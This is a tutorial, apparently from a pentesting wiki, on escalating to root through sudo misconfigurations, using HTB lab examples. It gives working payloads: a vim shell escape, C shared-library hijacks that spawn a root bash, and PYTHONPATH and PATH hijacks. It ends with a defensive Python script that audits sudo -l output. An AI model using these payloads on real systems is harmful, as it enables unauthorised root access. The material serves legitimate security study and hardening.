On this page, we cover specific sudo misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.
Practice
NOPASSWD
The following sudo configuration allows a user to execute a command with another user's privileges without entering a password.
If you can run a binary with sudo rights, have a look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case, with vim, we can spawn a shell with the following command:
sudo -u root vim -c '!sh'
LD_PRELOAD
LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library, including the C runtime library (libc.so). This is called preloading a library.
If env_keep+=LD_PRELOAD is explicitly listed in the sudo -l output and you can run any command with sudo, you can escalate your privileges.
// Saved as /tmp/privEsc.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */

// Runs when the library is loaded, before the target program's main()
void _init() {
    unsetenv("LD_PRELOAD");   // avoid preloading again in the child shell
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
Pick one of the shared objects in the list and hijack it by creating a file with the same name. For this demonstration, we will target the libpcre2-8.so.0 file.
// Saved as /tmp/libpcre2-8.so.0.c
#define _GNU_SOURCE   /* setresuid */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

// Runs when the hijacked library is loaded by the sudo target
void _init() {
    unsetenv("LD_LIBRARY_PATH");   // avoid loading this file again in the child shell
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
Then run the command with sudo and the LD_LIBRARY_PATH environment variable set:
# Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>
# Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find
SETENV
The SETENV directive allows the user to set environment variables while executing the command:
# Setenv on an arbitrary binary/script
$ sudo -l
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

# Setenv on binary/script without the full command path
$ sudo -l
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: find
The previous example, based on the HTB machine Admirer, was vulnerable to PYTHONPATH hijacking, loading an arbitrary Python library while the script executes as root:
# Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
Alternatively, you can set the PATH variable if the sudo rule names a binary without its full path.
# Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find
# Sudo with modified PATH
sudo PATH=/tmp:$PATH find
Command Path Hijacking
If we can execute a command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead, if the sudo rule specifies the binary without its full path, we need to check whether we have write permission on each directory in secure_path.
ls -al /usr/local/
ls -al /usr/
ls -al /
Assuming we can write an arbitrary file under /usr/sbin, we can place a payload there. For example, we create a fake python binary under /usr/sbin.
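As an added example (not from the original page), the following Python script audits a captured sudo -l listing for every pattern discussed above: NOPASSWD and SETENV tags, env_keep entries for loader variables such as LD_PRELOAD, commands without an absolute path, binaries with a GTFOBins shell escape, and writable secure_path directories. The sample listing, its user and host, and the small GTFOBins subset are constructed; the writable check is injectable so the audit also runs offline against saved output.

```python
import os
import re

# Constructed sample `sudo -l` output modelled on the Admirer listing above; user and host are made up.
SAMPLE_SUDO_L = """Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
    (ALL) NOPASSWD: find
    (root) /usr/bin/vim
"""
# Small hand-picked subset of binaries with a documented shell escape on GTFOBins.
SHELL_ESCAPES = {"vim", "vi", "find", "less", "more", "nano", "python", "python3", "perl", "awk"}
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH"}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def audit_sudo_l(text, writable=os.access):
    """Return (severity, message) findings; `writable(path, os.W_OK)` is injectable for offline testing."""
    findings = []
    head, _, body = text.partition("may run the following commands")
    defaults = " ".join(head.split())
    # LD_PRELOAD / LD_LIBRARY_PATH sections: env_keep hands a loader variable to a root process.
    kept = set()
    for group in re.findall(r'env_keep\s*\+?=\s*"?([A-Z0-9_ ]+)"?', defaults):
        kept.update(group.split())
    for var in sorted(kept & LOADER_VARS):
        findings.append(("high", f"env_keep preserves {var}"))
    # Command Path Hijacking section: a writable secure_path directory defeats the PATH restriction.
    m = re.search(r"secure_path=(\S+)", defaults)
    for d in (m.group(1).rstrip(",").replace("\\:", ":").split(":") if m else []):
        if writable(d, os.W_OK):
            findings.append(("high", f"secure_path directory {d} is writable by the caller"))
    for line in body.splitlines():
        rule = RULE_RE.match(line)
        if not rule:
            continue
        tags, cmd = rule.group("tags"), rule.group("cmd").strip()
        binary = cmd.split()[0]
        if "NOPASSWD" in tags:
            findings.append(("medium", f"NOPASSWD: {cmd} runs as {rule.group('runas')} without a password"))
        if "SETENV" in tags:  # SETENV section: the caller chooses PYTHONPATH/PATH for a root process
            findings.append(("high", f"SETENV on {cmd}"))
        if binary != "ALL" and not binary.startswith("/"):  # resolved via secure_path, so hijackable
            findings.append(("high", f"{binary} has no absolute path"))
        if os.path.basename(binary) in SHELL_ESCAPES:
            findings.append(("medium", f"{binary} has a known GTFOBins shell escape"))
    return findings
```

Run it against the real output of sudo -l on a host with the default writable check to get the live list of findings for that account.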